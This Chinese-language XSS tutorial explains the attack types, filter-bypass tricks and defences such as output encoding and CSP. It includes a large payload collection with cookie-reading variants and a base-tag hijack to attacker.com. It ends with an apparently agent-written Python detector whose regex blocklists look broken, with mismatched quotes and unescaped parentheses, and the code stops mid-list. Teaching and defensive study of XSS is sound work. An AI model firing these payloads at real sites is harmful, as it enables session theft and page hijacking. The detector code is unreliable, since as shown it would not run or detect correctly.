XSS
跨站脚本(XSS)是Web安全领域最古老、最普遍的漏洞之一。其核心本质是数据与代码边界的混淆:攻击者将恶意脚本(通常是JavaScript)作为数据注入到Web应用中,当浏览器渲染页面时,这些数据被当作代码执行,从而导致信息泄露、会话劫持等后果。
一、原理与分类
XSS的根源在于不可信数据被未经过滤地注入了HTML/JS上下文。
1. 反射型 XSS
-
特点:非持久化,恶意脚本通过URL参数、表单提交等方式发送给服务器,服务器将脚本“反射”回响应页面中。
-
触发:需要诱导用户点击恶意链接(通常结合钓鱼或短链接)。
-
示例:
// 危险代码 echo "欢迎: " . $_GET['name'];若
name=<script>alert(1)</script>,则脚本直接执行。
2. 存储型 XSS
- 特点:持久化,恶意脚本被存储在后端(数据库、文件系统等),当其他用户访问正常页面时,脚本被加载执行。
- 危害:影响范围广,常见于评论区、个人信息、帖子等场景。
- 示例:攻击者在留言板提交
<script>stealCookie()</script>,所有浏览留言的用户都会中招。
3. DOM型 XSS
-
特点:完全在前端发生,不经过服务器后端逻辑。通过修改页面DOM环境(如
location.hash、document.referrer、innerHTML等)注入恶意脚本。 -
区别:服务器响应与正常页面无异,恶意代码在客户端本地执行。
-
示例:
// 危险代码 var hash = location.hash.slice(1); document.getElementById("output").innerHTML = hash;访问
page.html#<img src=x onerror=alert(1)>即可触发。
二、绕过姿势(进阶技巧)
防御机制(如输入过滤、输出编码、CSP)不断演进,攻击者也总结出大量绕过手法。以下列举经典及现代绕过思路:
1. 上下文感知绕过
-
HTML标签内:当输出点在标签属性(如
<input value="...">)时,可提前闭合引号并注入新事件:" onmouseover="alert(1) -
JavaScript代码中:如果输出在
<script>标签内,需考虑闭合字符串或利用模板字符串:var name = '用户输入'; // 若输入 ';alert(1);// 则逃逸
2. 编码绕过
-
HTML实体编码:某些过滤仅检查
<和>,但浏览器在解析HTML属性时会先解码实体:<img src=x onerror="alert(1)"> -
Unicode/URL编码:在
javascript:伪协议或data:中使用。 -
多重编码:针对递归解码的过滤器,使用两次URL编码。
3. 事件与伪协议滥用
-
HTML5新事件:
onload、onerror、onfocus、onpointermove等。 -
伪协议:
<a href="javascript:alert(1)">click</a> <iframe src="javascript:alert(1)"> -
<svg>与<math>标签:这些标签内部允许脚本且对过滤较宽松:<svg><script>alert(1)</script>
4. 过滤检测对抗
- 大小写混合:
<ScRiPt>绕过黑名单。 - 双写:
<scr<script>ipt>当过滤仅删除一次时。 - 利用换行与空格:
<script \n src="...">某些正则可能遗漏。 - 字符截断:使用
%00、/或 Unicode 控制字符干扰正则匹配。
5. 利用浏览器特性
<base>标签:改变页面相对URL,可劫持资源加载。<link>与@import:加载外部样式表,结合expression(IE旧版)或behavior。<template>与<iframe>:绕过某些基于AST的XSS过滤器。
6. 基于DOM的独特向量
document.write与innerHTML的二次注入。window.name、postMessage跨域传递恶意数据。localStorage/sessionStorage中存储的未过滤数据。
7. 借助CSP绕过
-
如果CSP使用
unsafe-inline或允许data:、blob:,可利用:<a href="data:text/html,<script>alert(1)</script>">click</a> -
CSP策略配置不当:如允许
*.cdn.com,攻击者可上传恶意脚本到CDN。
三、防御体系(纵深防御)
防御XSS必须遵循“输出编码”为根本,结合多层安全机制。
1. 核心原则:上下文感知输出编码
- HTML实体编码:将
<、>、"、'、&等转换为<等,用于HTML标签体。 - HTML属性编码:对属性值内的特殊字符编码(尤其注意引号)。
- JavaScript字符串编码:对 ``、
'、"、\n等转义,确保用户数据不会逃逸出字符串。 - URL编码:对URL参数值进行编码,避免
javascript:伪协议注入。 - CSS编码:对
style属性内用户输入进行严格过滤或编码。
推荐:使用成熟的模板引擎(如React的JSX、Vue的模板、Jinja2),它们默认对输出进行上下文编码。
2. 输入过滤(辅助手段)
- 严格白名单:对于富文本,使用经过安全测试的库(如DOMPurify)进行清洗,仅允许安全的标签和属性。
- 类型校验:如年龄字段必须是数字,邮箱必须符合格式。
注意:输入过滤不能作为主要防御,因为业务可能需要保留特殊字符,且过滤逻辑复杂易出错。
3. 安全头部分
-
CSP (Content Security Policy) :
配置Content-Security-Policy头,禁用unsafe-inline和unsafe-eval,使用nonce或hash机制白名单内联脚本。Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com 'nonce-随机值' -
HttpOnly:设置Cookie的
HttpOnly属性,使恶意脚本无法通过document.cookie读取会话令牌。 -
X-XSS-Protection(已废弃,但部分老旧浏览器仍有):
X-XSS-Protection: 1; mode=block,作为纵深防御一层。
4. 其他实践
- 使用现代框架:React、Vue、Angular等默认会对插值内容进行转义,避免直接操作DOM(
v-html、dangerouslySetInnerHTML需谨慎)。 - 避免将用户内容放入动态执行的JavaScript:如
eval()、setTimeout(someUserInput)、Function()构造函数。 - Cookie安全:关键Cookie应设置
Secure、SameSite=Strict或Lax属性。
四、payload合集
'level1.php?name=<img src=1 onerror=alert(1)>
"><scrscriptipt>alert(1)</scrscriptipt>
<svg%0Aonload=alert(1)>
?arg01=a&arg02=b onmousemove='alert(1)'
?arg01=a&arg02=b onclick='alert(1)'
"><a HrEf=javascript:alert(1)>
"><a href=javascript:alert(1)>
' onclick='alert(1)
" onclick="alert(1)
"><script>alert(1)</script>
<script>alert(1)</script>
<svg οnlοad=alert(1)>
<img src=x onerror=alert(1)>
<a herf=javascript:alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<script>alert(document.cookie)</script>
<script>prompt(document.cookie)</script>
<script>confirm(/xss/)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
javascript:aler //Unicode码 还有十六进制 URL编码 JS编码 HTML实体编码等等
<script>alert/*dsa*/(1)</script> //绕过黑名单
<script>(alert)(1)</script> //绕过黑名单
<svg onload="alert(1)">
<body onload="alert('xss')"> //过滤 script时
"><svg/onload=alert(1)
<svg onmousemove="alert(1)">
<IMG SRC="" onerror="alert('XSS')">
<IMG SRC="" onerror="javascript:alert('XSS');">
<input value="1" autofocus onfocus=alert(1) x=""> //过滤 script时
<iframe src="javascript:alert(1)"></iframe> //过滤 script时
<input name="name" value=”” onmousemove=prompt(document.cookie) >
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<input type = "button" value ="clickme" onclick="alert('click me')" />
制表符 绕过滤器的
<IMG SRC="" onerror="javšscript:alert('XSS');">
1.<iframe src=javascript:alert(1)></iframe> //Tab
2.<iframe src=javascript:alert(1)></iframe> //回车
3.<iframe src=javascript:alert(1)></iframe> //换行
4.<iframe src=javascript:alert(1)></iframe> //编码冒号
5.<iframe src=javascript:alert(1)></iframe> //HTML5 新增的实体命名编码,IE6、7下不支持
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object>
"><img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))">
<script>onerror=alert;throw document.cookie</script>
<script>{onerror=alert}throw 1337</script> //过滤 单引号,双引号,小括号时 没过滤script
<a href="" onclick="alert(1111)">
' οnclick=alert(1111) ' //鼠标点击事件执行JavaScript语句
<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
<script src="/api/jsonp?callback=alert(1)"></script>
<base href="https://attacker.com/">
<script src="/jquery.js"></script>
<link rel="preload" as="script"href="data:;base64,YWxlcnQoMSk="onload="eval(this.href.split(',')[1])">
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
navigator.serviceWorker.register('/sw.js?script=alert(1)')
- 自动化扫描:使用工具如Burp Suite、OWASP ZAP、XSStrike进行初步探测。
- 手动测试:针对每个输入点,尝试注入不同上下文的payload(HTML、属性、JS、URL、CSS)。
- 代码审计:重点关注
innerHTML、document.write、eval、setTimeout等危险函数,以及后台未编码的输出点。
五、 检测与防护思路
| 维度 | 关键点 |
|---|---|
| 原理 | 数据被解释为代码(HTML/JS上下文混淆) |
| 分类 | 反射型、存储型、DOM型(根据持久性与触发方式) |
| 绕过 | 上下文逃逸、编码混淆、过滤绕过、浏览器特性滥用、CSP配置缺陷 |
| 防御 | 上下文输出编码(核心)+ CSP + HttpOnly + 输入白名单 + 安全框架 |
XSS本质上是信任问题:永远不要信任用户输入,也永远不要信任外部数据。通过“输出编码”将数据与代码彻底分离,再辅以纵深防御策略,可以有效将XSS风险降至最低。随着Web标准演进,CSP已成为现代Web应用对抗XSS的强有力武器,建议所有新项目默认启用严格的CSP策略。
下面基于规则匹配和语义分析利用CC等Agent写的检测与防护脚本,运行环境为Python 3.12。
检测脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
XSS (Cross-Site Scripting) Detection and Protection System
Based on rule matching and semantic analysis principles
Compatible with Python 2.7+
Author: Security Tool
Version: 1.0.0
"""
from __future__ import print_function
class RiskLevel:
"""Risk level enumeration for XSS threats"""
SAFE = "safe"
LOW = "low"
MEDIUM = "medium"
HIGH = "high"
CRITICAL = "critical"
class DetectionResult:
"""Result of XSS detection analysis"""
def __init__(self, is_xss, risk_level, matched_patterns, attack_types,
analysis_details, recommendations, sanitized_input=None):
self.is_xss = is_xss
self.risk_level = risk_level
self.matched_patterns = matched_patterns
self.attack_types = attack_types
self.analysis_details = analysis_details
self.recommendations = recommendations
self.sanitized_input = sanitized_input
class XSSDetector:
"""
XSS Detector based on rule matching and semantic analysis
"""
XSS_ATTACK_TYPES = {
"reflected": {"name": "Reflected XSS", "description": "Direct reflection of unsanitized input", "severity": RiskLevel.HIGH},
"stored": {"name": "Stored XSS", "description": "Malicious script stored in database", "severity": RiskLevel.CRITICAL},
"dom": {"name": "DOM-based XSS", "description": "Client-side DOM manipulation", "severity": RiskLevel.HIGH},
"vector": {"name": "XSS Vector", "description": "Common XSS attack vector", "severity": RiskLevel.HIGH},
"bypass": {"name": "Filter Bypass", "description": "Attempting to bypass security filters", "severity": RiskLevel.CRITICAL},
}
def __init__(self):
self.rules = self._init_detection_rules()
self.dangerous_tags = self._init_dangerous_tags()
self.dangerous_attributes = self._init_dangerous_attributes()
self.javascript_protocols = self._init_javascript_protocols()
def _init_detection_rules(self):
"""Initialize XSS detection rules with patterns"""
return [
{
'name': 'Script Tag Injection',
'pattern': r'<script[^>]*>.*?</script>',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Direct script tag injection',
'case_insensitive': True,
'dotall': True
},
{
'name': 'Script Tag Self-Closing',
'pattern': r'<script[^>]*/?>',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Self-closing script tag',
'case_insensitive': True
},
{
'name': 'Event Handler on*',
'pattern': r'\bon\w+\s*=',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Event handler attribute injection (onclick, onload, etc.)',
'case_insensitive': True
},
{
'name': 'Event Handler JavaScript',
'pattern': r'<[^>]+\s+on\w+\s*=\s*["']?javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass',
'description': 'Event handler with javascript: protocol',
'case_insensitive': True
},
{
'name': 'JavaScript Protocol',
'pattern': r'javascript\s*:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'JavaScript protocol handler',
'case_insensitive': True
},
{
'name': 'JavaScript Protocol in href',
'pattern': r'href\s*=\s*["']?\s*javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'JavaScript protocol in href attribute',
'case_insensitive': True
},
{
'name': 'Data URI Scheme',
'pattern': r'data\s*:\s*text/html',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Data URI with HTML content',
'case_insensitive': True
},
{
'name': 'Iframe Injection',
'pattern': r'<iframe[^>]*>',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Iframe tag injection',
'case_insensitive': True
},
{
'name': 'Iframe with JavaScript',
'pattern': r'<iframe[^>]*src\s*=\s*["']?\s*javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass',
'description': 'Iframe with javascript: source',
'case_insensitive': True
},
{
'name': 'Object Tag',
'pattern': r'<object[^>]*>',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Object tag injection',
'case_insensitive': True
},
{
'name': 'Embed Tag',
'pattern': r'<embed[^>]*>',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Embed tag injection',
'case_insensitive': True
},
{
'name': 'Applet Tag',
'pattern': r'<applet[^>]*>',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Java applet injection',
'case_insensitive': True
},
{
'name': 'Form Action Injection',
'pattern': r'<form[^>]*action\s*=\s*["']?\s*javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Form with javascript: action',
'case_insensitive': True
},
{
'name': 'Body onload Event',
'pattern': r'<body[^>]*onload\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Body onload event handler',
'case_insensitive': True
},
{
'name': 'Meta Refresh Redirect',
'pattern': r'<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']?\s*\d+\s*;\s*url\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Meta refresh with URL redirect',
'case_insensitive': True,
'dotall': True
},
{
'name': 'Link Import',
'pattern': r'<link[^>]*rel\s*=\s*["']?\s*import["']?',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Link tag with import',
'case_insensitive': True
},
{
'name': 'SVG with Script',
'pattern': r'<svg[^>]*>.*?<script',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'SVG with embedded script',
'case_insensitive': True,
'dotall': True
},
{
'name': 'SVG onload Event',
'pattern': r'<svg[^>]*on\w+\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'SVG with event handler',
'case_insensitive': True
},
{
'name': 'IE Expression',
'pattern': r'expression\s*(',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'IE CSS expression',
'case_insensitive': True
},
{
'name': 'VBScript Protocol',
'pattern': r'vbscript\s*:',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'VBScript protocol handler',
'case_insensitive': True
},
{
'name': 'Angular Binding',
'pattern': r'{{.*?}}',
'risk': RiskLevel.MEDIUM,
'attack_type': 'vector',
'description': 'Angular template binding',
'case_insensitive': False
},
{
'name': 'Angular ng-',
'pattern': r'ng-\w+',
'risk': RiskLevel.MEDIUM,
'attack_type': 'vector',
'description': 'Angular directive',
'case_insensitive': True
},
{
'name': 'HTML Entity Encoding',
'pattern': r'&#\d+;|&#x[0-9a-fA-F]+;',
'risk': RiskLevel.MEDIUM,
'attack_type': 'bypass',
'description': 'HTML entity encoding attempt',
'case_insensitive': True
},
{
'name': 'Null Byte Injection',
'pattern': r'\x00|%00',
'risk': RiskLevel.MEDIUM,
'attack_type': 'bypass',
'description': 'Null byte injection attempt',
'case_insensitive': False
},
{
'name': 'Unicode Escape',
'pattern': r'\u[0-9a-fA-F]{4}',
'risk': RiskLevel.MEDIUM,
'attack_type': 'bypass',
'description': 'Unicode escape sequence',
'case_insensitive': True
},
{
'name': 'CSS Expression',
'pattern': r'url\s*(\s*["']?\s*javascript:',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'CSS URL with javascript:',
'case_insensitive': True
},
{
'name': 'Base Tag',
'pattern': r'<base[^>]*href\s*=\s*["']?',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Base tag for relative URL hijacking',
'case_insensitive': True
},
{
'name': 'SVG use',
'pattern': r'<use[^>]*href\s*=\s*["']?\s*javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass',
'description': 'SVG use with javascript: href',
'case_insensitive': True
},
{
'name': 'Animation Event',
'pattern': r'onanimation\w+\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'CSS animation event handler',
'case_insensitive': True
},
{
'name': 'Cookie Access',
'pattern': r'document.cookie',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Document cookie access',
'case_insensitive': True
},
{
'name': 'LocalStorage Access',
'pattern': r'localStorage|sessionStorage',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Web storage access',
'case_insensitive': True
},
{
'name': 'InnerHTML Assignment',
'pattern': r'innerHTML\s*=|innerHTML\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'dom',
'description': 'innerHTML DOM manipulation',
'case_insensitive': True
},
{
'name': 'Document Write',
'pattern': r'document.write\s*(',
'risk': RiskLevel.HIGH,
'attack_type': 'dom',
'description': 'document.write usage',
'case_insensitive': True
},
{
'name': 'Eval Usage',
'pattern': r'\beval\s*(',
'risk': RiskLevel.HIGH,
'attack_type': 'dom',
'description': 'eval() function usage',
'case_insensitive': True
},
{
'name': 'Location Assignment',
'pattern': r'location.(href|replace|assign)\s*=\s*["']?\s*javascript:',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Location with javascript: protocol',
'case_insensitive': True
},
{
'name': 'Alert Pattern',
'pattern': r'alert\s*(\s*['"]?\s*)',
'risk': RiskLevel.LOW,
'attack_type': 'vector',
'description': 'Common XSS test pattern',
'case_insensitive': True
},
{
'name': 'Img onerror',
'pattern': r'<img[^>]*onerror\s*=',
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector',
'description': 'Image onerror event handler',
'case_insensitive': True
},
{
'name': 'Img src',
'pattern': r'<img[^>]*src\s*=\s*["']?\s*(javascript:|data:)',
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass',
'description': 'Image with dangerous src',
'case_insensitive': True
},
{
'name': 'Video onerror',
'pattern': r'<(video|audio)[^>]*onerror\s*=',
'risk': RiskLevel.HIGH,
'attack_type': 'vector',
'description': 'Video/audio onerror event',
'case_insensitive': True
},
]
def _init_dangerous_tags(self):
"""Initialize list of dangerous HTML tags"""
return [
'script', 'iframe', 'object', 'embed', 'applet', 'form',
'input', 'button', 'select', 'textarea', 'isindex',
'link', 'base', 'meta', 'head', 'body', 'svg', 'math',
'video', 'audio', 'source', 'track', 'canvas', 'map',
'area', 'param', 'bgsound', 'blink', 'comment', 'listing',
'marquee', 'xmp', 'plaintext', 'noembed', 'noscript'
]
def _init_dangerous_attributes(self):
"""Initialize list of dangerous HTML attributes"""
return [
'onclick', 'ondblclick', 'onmousedown', 'onmouseup', 'onmouseover',
'onmousemove', 'onmouseout', 'onkeydown', 'onkeypress', 'onkeyup',
'onload', 'onunload', 'onfocus', 'onblur', 'onsubmit', 'onreset',
'onselect', 'onchange', 'onerror', 'onabort', 'onresize',
'onscroll', 'oncontextmenu', 'onmouseenter', 'onmouseleave',
'onfocusin', 'onfocusout', 'onanimationstart', 'onanimationend',
'onanimationiteration', 'ontransitionend'
]
def _init_javascript_protocols(self):
"""Initialize list of dangerous protocols"""
return [
'javascript:', 'vbscript:', 'data:', 'mocha:', 'livescript:',
'expression:', 'behavior:', 'x-script:'
]
def detect(self, user_input, context="general"):
"""
Main detection method - analyzes input for XSS threats
Args:
user_input: The input string to analyze
context: The context where input will be used (general, html, js, url, etc.)
Returns:
DetectionResult with analysis details
"""
import re
matched_rules = []
attack_types = []
risk_levels = []
for rule in self.rules:
pattern = rule['pattern']
flags = re.IGNORECASE if rule.get('case_insensitive') else 0
if rule.get('dotall'):
flags |= re.DOTALL
if re.search(pattern, user_input, flags):
matched_rules.append({
'name': rule['name'],
'description': rule['description'],
'risk': rule['risk'],
'attack_type': rule['attack_type']
})
risk_levels.append(rule['risk'])
if rule['attack_type'] not in attack_types:
attack_types.append(rule['attack_type'])
semantic_analysis = self._semantic_analysis(user_input, context)
matched_rules.extend(semantic_analysis['additional_rules'])
risk_levels.extend(semantic_analysis['additional_risks'])
if semantic_analysis['attack_types']:
attack_types.extend(semantic_analysis['attack_types'])
final_risk = self._calculate_final_risk(risk_levels)
is_xss = len(matched_rules) > 0 or final_risk != RiskLevel.SAFE
recommendations = self._generate_recommendations(
matched_rules,
semantic_analysis,
context
)
return DetectionResult(
is_xss=is_xss,
risk_level=final_risk,
matched_patterns=[r['name'] for r in matched_rules],
attack_types=list(set(attack_types)),
analysis_details=self._generate_analysis_report(
matched_rules,
semantic_analysis,
context
),
recommendations=recommendations,
sanitized_input=None
)
def _semantic_analysis(self, user_input, context):
"""Perform semantic analysis on the input"""
import re
additional_rules = []
additional_risks = []
detected_attack_types = []
details = {}
if self._has_unbalanced_tags(user_input):
additional_rules.append({
'name': 'Unbalanced HTML Tags',
'description': 'Detected potentially malicious unbalanced tags',
'risk': RiskLevel.MEDIUM,
'attack_type': 'bypass'
})
additional_risks.append(RiskLevel.MEDIUM)
detected_attack_types.append('bypass')
dangerous_tag_analysis = self._analyze_dangerous_tags(user_input)
if dangerous_tag_analysis['found']:
additional_rules.append({
'name': 'Dangerous Tag Usage',
'description': "Found dangerous tags: %s" % ", ".join(dangerous_tag_analysis['tags'][:5]),
'risk': RiskLevel.HIGH,
'attack_type': 'vector'
})
additional_risks.append(RiskLevel.HIGH)
detected_attack_types.append('vector')
event_handler_analysis = self._analyze_event_handlers(user_input)
if event_handler_analysis['found']:
additional_rules.append({
'name': 'Event Handler Detection',
'description': "Found event handlers: %s" % ", ".join(event_handler_analysis['handlers'][:5]),
'risk': RiskLevel.CRITICAL,
'attack_type': 'vector'
})
additional_risks.append(RiskLevel.CRITICAL)
detected_attack_types.append('vector')
protocol_analysis = self._analyze_protocols(user_input)
if protocol_analysis['found']:
additional_rules.append({
'name': 'Dangerous Protocol Handler',
'description': "Found dangerous protocols: %s" % ", ".join(protocol_analysis['protocols']),
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass'
})
additional_risks.append(RiskLevel.CRITICAL)
detected_attack_types.append('bypass')
encoding_analysis = self._analyze_encoding(user_input)
if encoding_analysis['found']:
additional_rules.append({
'name': 'Encoding Obfuscation',
'description': "Found encoding: %s" % ", ".join(encoding_analysis['types']),
'risk': RiskLevel.MEDIUM,
'attack_type': 'bypass'
})
additional_risks.append(RiskLevel.MEDIUM)
detected_attack_types.append('bypass')
if context == "js":
js_context_analysis = self._analyze_js_context(user_input)
additional_rules.extend(js_context_analysis['rules'])
additional_risks.extend(js_context_analysis['risks'])
elif context == "url":
url_context_analysis = self._analyze_url_context(user_input)
additional_rules.extend(url_context_analysis['rules'])
additional_risks.extend(url_context_analysis['risks'])
dom_analysis = self._analyze_dom_patterns(user_input)
if dom_analysis['found']:
additional_rules.append({
'name': 'DOM Manipulation Pattern',
'description': 'Found potential DOM manipulation',
'risk': RiskLevel.HIGH,
'attack_type': 'dom'
})
additional_risks.append(RiskLevel.HIGH)
detected_attack_types.append('dom')
return {
'additional_rules': additional_rules,
'additional_risks': additional_risks,
'attack_types': detected_attack_types,
'details': details
}
def _has_unbalanced_tags(self, text):
"""Check for unbalanced HTML tags"""
import re
tag_pattern = r'<(/?)([\w]+)[^>]*>'
tags = re.findall(tag_pattern, text, re.IGNORECASE)
open_tags = []
for is_closing, tag_name in tags:
tag_name = tag_name.lower()
if is_closing:
if tag_name in open_tags:
open_tags.remove(tag_name)
else:
if tag_name in self.dangerous_tags:
if not tag_name.startswith('!'):
open_tags.append(tag_name)
return len(open_tags) > 0
def _analyze_dangerous_tags(self, text):
"""Analyze dangerous HTML tag usage"""
import re
found_tags = []
for tag in self.dangerous_tags:
pattern = r'<\s*' + tag + r'[\s>]'
if re.search(pattern, text, re.IGNORECASE):
found_tags.append(tag)
return {
'found': len(found_tags) > 0,
'tags': found_tags
}
def _analyze_event_handlers(self, text):
"""Analyze event handler usage"""
import re
found_handlers = []
for handler in self.dangerous_attributes:
pattern = r'\b' + handler + r'\s*='
if re.search(pattern, text, re.IGNORECASE):
found_handlers.append(handler)
return {
'found': len(found_handlers) > 0,
'handlers': found_handlers[:5]
}
def _analyze_protocols(self, text):
"""Analyze dangerous protocol handlers"""
found_protocols = []
for protocol in self.javascript_protocols:
if protocol in text.lower():
found_protocols.append(protocol)
return {
'found': len(found_protocols) > 0,
'protocols': found_protocols
}
def _analyze_encoding(self, text):
"""Analyze encoding attempts"""
import re
encoding_types = []
if re.search(r'&#\d+;|&#x[0-9a-fA-F]+;', text):
encoding_types.append('HTML Entity')
if re.search(r'%[0-9a-fA-F]{2}', text):
encoding_types.append('URL')
if re.search(r'\u[0-9a-fA-F]{4}', text):
encoding_types.append('Unicode')
return {
'found': len(encoding_types) > 0,
'types': encoding_types
}
def _analyze_js_context(self, text):
"""Analyze JavaScript context vulnerabilities"""
import re
rules = []
risks = []
if '+' in text or 'eval' in text.lower():
rules.append({
'name': 'JS String Manipulation',
'description': 'Potential JS injection through string manipulation',
'risk': RiskLevel.HIGH,
'attack_type': 'dom'
})
risks.append(RiskLevel.HIGH)
return {'rules': rules, 'risks': risks}
def _analyze_url_context(self, text):
"""Analyze URL context vulnerabilities"""
rules = []
risks = []
if 'javascript:' in text.lower():
rules.append({
'name': 'JavaScript in URL',
'description': 'JavaScript protocol in URL context',
'risk': RiskLevel.CRITICAL,
'attack_type': 'bypass'
})
risks.append(RiskLevel.CRITICAL)
return {'rules': rules, 'risks': risks}
def _analyze_dom_patterns(self, text):
"""Analyze DOM manipulation patterns"""
import re
dom_patterns = [
r'innerHTML\s*=',
r'outerHTML\s*=',
r'document.write',
r'\beval\s*(',
r'setTimeout\s*(\s*["']',
r'setInterval\s*(\s*["']',
]
found = False
for pattern in dom_patterns:
if re.search(pattern, text, re.IGNORECASE):
found = True
break
return {'found': found}
def _calculate_final_risk(self, risk_levels):
"""Calculate the final risk level from multiple detections"""
if not risk_levels:
return RiskLevel.SAFE
risk_order = [
RiskLevel.CRITICAL,
RiskLevel.HIGH,
RiskLevel.MEDIUM,
RiskLevel.LOW,
RiskLevel.SAFE
]
for risk in risk_order:
if risk in risk_levels:
return risk
return RiskLevel.SAFE
def _generate_recommendations(self, matched_rules, semantic_analysis, context):
"""Generate security recommendations"""
recommendations = []
recommendations.append("Use context-aware output encoding (HTML, JavaScript, URL)")
recommendations.append("Use Content Security Policy (CSP) headers")
if context == "html":
recommendations.append("Sanitize HTML using a trusted library (DOMPurify, Bleach)")
recommendations.append("Use DOMPurify for HTML sanitization")
elif context == "js":
recommendations.append("Use JSON.parse() instead of eval()")
recommendations.append("Avoid innerHTML, use textContent or safe DOM APIs")
elif context == "url":
recommendations.append("Validate and sanitize all URL parameters")
recommendations.append("Use URL validation and whitelist allowed protocols")
attack_types = set()
for rule in matched_rules:
if 'attack_type' in rule:
attack_types.add(rule['attack_type'])
if 'vector' in attack_types:
recommendations.append("Remove or neutralize all HTML tags")
recommendations.append("Strip dangerous attributes like event handlers")
if 'bypass' in attack_types:
recommendations.append("Decode and re-encode input to neutralize obfuscation")
recommendations.append("Implement multiple layers of validation")
if 'dom' in attack_types:
recommendations.append("Use safe DOM APIs (textContent, setAttribute)")
recommendations.append("Avoid using eval() and similar functions")
recommendations.append("Use DOMPurify for DOM-based XSS prevention")
critical_rules = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
if critical_rules:
recommendations.append("URGENT: Review and fix input validation immediately")
recommendations.append("Implement input whitelist validation")
recommendations.append("Enable CSP with strict policy")
seen = set()
unique_recommendations = []
for rec in recommendations:
if rec not in seen:
seen.add(rec)
unique_recommendations.append(rec)
return unique_recommendations
def _generate_analysis_report(self, matched_rules, semantic_analysis, context):
"""Generate detailed analysis report"""
parts = []
parts.append("Context: %s" % context)
if matched_rules:
critical = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
high = [r for r in matched_rules if r['risk'] == RiskLevel.HIGH]
medium = [r for r in matched_rules if r['risk'] == RiskLevel.MEDIUM]
low = [r for r in matched_rules if r['risk'] == RiskLevel.LOW]
parts.append("\nRule-based Detection: %d patterns matched" % len(matched_rules))
if critical:
parts.append(" CRITICAL (%d): %s" % (len(critical), ", ".join([r['name'] for r in critical[:3]])))
if high:
parts.append(" HIGH (%d): %s" % (len(high), ", ".join([r['name'] for r in high[:3]])))
if medium:
parts.append(" MEDIUM (%d): %s" % (len(medium), ", ".join([r['name'] for r in medium[:3]])))
if low:
parts.append(" LOW (%d): %s" % (len(low), ", ".join([r['name'] for r in low[:3]])))
else:
parts.append("\nRule-based Detection: No attack patterns detected")
if semantic_analysis['additional_rules']:
parts.append("\nSemantic Analysis: %d anomalies" % len(semantic_analysis['additional_rules']))
for rule in semantic_analysis['additional_rules']:
parts.append(" - %s: %s" % (rule['name'], rule['description']))
else:
parts.append("\nSemantic Analysis: No anomalies detected")
if semantic_analysis.get('attack_types'):
parts.append("\nAttack Types: %s" % ", ".join(semantic_analysis['attack_types']))
return "\n".join(parts)
class XSSProtector:
"""
XSS Protector with sanitization capabilities
"""
def __init__(self):
self.detector = XSSDetector()
self._init_replacement_rules()
def _init_replacement_rules(self):
"""Initialize sanitization replacement rules"""
import re
self.replacement_rules = [
(re.compile(r'<script[^>]*>.*?</script>', re.IGNORECASE | re.DOTALL), '<script>...</script>'),
(re.compile(r'<script[^>]*/?>', re.IGNORECASE), '<script>'),
(re.compile(r'\s*on\w+\s*=\s*["']?[^"']*["']?', re.IGNORECASE), ''),
(re.compile(r'javascript\s*:', re.IGNORECASE), 'javascript blocked:'),
(re.compile(r'<iframe[^>]*>.*?</iframe>', re.IGNORECASE | re.DOTALL), '<iframe>'),
(re.compile(r'<(object|embed|applet)[^>]*>', re.IGNORECASE), '<object/embed/applet>'),
(re.compile(r'<svg[^>]*>.*?</svg>', re.IGNORECASE | re.DOTALL), '<svg>'),
(re.compile(r'data\s*:\s*text/html', re.IGNORECASE), 'data:text/html blocked'),
(re.compile(r'vbscript\s*:', re.IGNORECASE), 'vbscript blocked:'),
(re.compile(r'expression\s*(', re.IGNORECASE), 'expression blocked('),
